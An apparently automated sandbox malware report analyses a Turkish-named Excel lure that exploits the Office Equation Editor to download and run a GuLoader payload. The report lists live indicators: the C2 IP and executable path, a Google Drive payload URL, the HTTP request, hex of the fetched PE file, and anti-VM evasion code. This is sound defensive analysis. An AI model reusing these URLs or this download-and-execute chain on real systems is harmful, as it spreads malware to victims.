Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yeni teklif talebi.xlsx

Overview

General Information

Sample Name:yeni teklif talebi.xlsx
Analysis ID:626603
MD5:b32d7bac7fb9b903ea73a041f13d3b61
SHA1:359458f03b700820c3b4f5fc1838ef7ea0d3cd14
SHA256:35bfba75e0bc2a473ee9964f138acd21381ddf6fd196b35127a304fa61b87826
Tags:VelvetSweatshopxlsx
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Snort IDS alert for network traffic
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 980 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 204 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2644 cmdline: "C:\Users\Public\vbc.exe" MD5: 5D160471A3168EAC0D8C34060B4F357B)
  • cleanup
{"Payload URL": "https://drive.google.com/uc?export=download&id=1wHFCph_Lr0nFivB5TOSebc-nHbiOVX9m"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.1166385504.0000000003FB0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Exploits

    barindex
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 23.95.34.9, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 204, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 204, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Komiten6[1].exe
    Timestamp:192.168.2.2223.95.34.949171802022550 05/14/22-15:22:35.305181
    SID:2022550
    Source Port:49171
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000004.00000002.1166385504.0000000003FB0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1wHFCph_Lr0nFivB5TOSebc-nHbiOVX9m"}
    Source: yeni teklif talebi.xlsxReversingLabs: Detection: 21%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Komiten6[1].exeVirustotal: Detection: 38%Perma Link
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Komiten6[1].exeReversingLabs: Detection: 24%
    Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 24%

    Exploits

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 23.95.34.9 Port: 80
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040699E FindFirstFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,

    Software Vulnerabilities

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A06EE ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A064D LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A06C0 URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A0667 URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A05C1 URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A06D9 ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A05DD URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A05A8 ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A0713 ExitProcess,
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 23.95.34.9:80
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 23.95.34.9:80

    Networking

    barindex
    Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49171 -> 23.95.34.9:80
    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1wHFCph_Lr0nFivB5TOSebc-nHbiOVX9m
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 May 2022 13:22:35 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.0.18Last-Modified: Fri, 13 May 2022 13:26:01 GMTETag: "1dd5e-5dee49d9d61f9"Accept-Ranges: bytesContent-Length: 122206Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1f 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 2a 02 00 00 08 00 00 40 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 f0 07 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 d0 07 00 10 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 66 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 03 02 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 20 05 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 10 1d 00 00 00 d0 07 00 00 1e 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /zaki/Komiten6.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.34.9Connection: Keep-Alive
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A064D LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.34.9
    Source: EQNEDT32.EXE, 00000002.00000002.955663406.0000000000724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.955663406.0000000000724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.955420240.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.34.9/zaki/Komiten6.exe
    Source: EQNEDT32.EXE, 00000002.00000002.955909321.00000000036A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.34.9/zaki/Komiten6.exej
    Source: EQNEDT32.EXE, 00000002.00000002.955420240.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.34.9/zaki/Komiten6.exemmC:
    Source: vbc.exe, 00000004.00000002.1166019325.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.954551791.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, Komiten6[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E1683BB.emfJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A064D LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: global trafficHTTP traffic detected: GET /zaki/Komiten6.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.34.9Connection: Keep-Alive
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

    System Summary

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Komiten6[1].exeJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00406D5F
    Source: C:\Users\Public\vbc.exeCode function: 4_2_73BF1BFF
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and write
    Source: yeni teklif talebi.xlsxReversingLabs: Detection: 21%
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$yeni teklif talebi.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR59A3.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@4/15@0/1
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004021AA CoCreateInstance,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
    Source: C:\Users\Public\vbc.exeFile written: C:\Users\user\AppData\Local\Temp\Overliggedagene225.iniJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000004.00000002.1166385504.0000000003FB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 4_2_73BF30C0 push eax; ret
    Source: C:\Users\Public\vbc.exeCode function: 4_2_73BF1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nshD0AF.tmp\System.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Komiten6[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A064D LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000003FB061D second address: 0000000003FB061D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC78CA7226h 0x00000004 test bl, al 0x00000006 cmp ebx, ecx 0x00000008 jc 00007FDC78CA718Eh 0x0000000a cmp edx, ecx 0x0000000c inc ebp 0x0000000d cmp ch, bh 0x0000000f inc ebx 0x00000010 rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1316Thread sleep time: -420000s >= -30000s
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040699E FindFirstFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end node
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end node
    Source: EQNEDT32.EXE, 00000002.00000002.955557864.00000000006F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: vbc.exe, 00000004.00000002.1166086256.000000000060D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exeCode function: 4_2_73BF1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A071A mov edx, dword ptr fs:[00000030h]
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
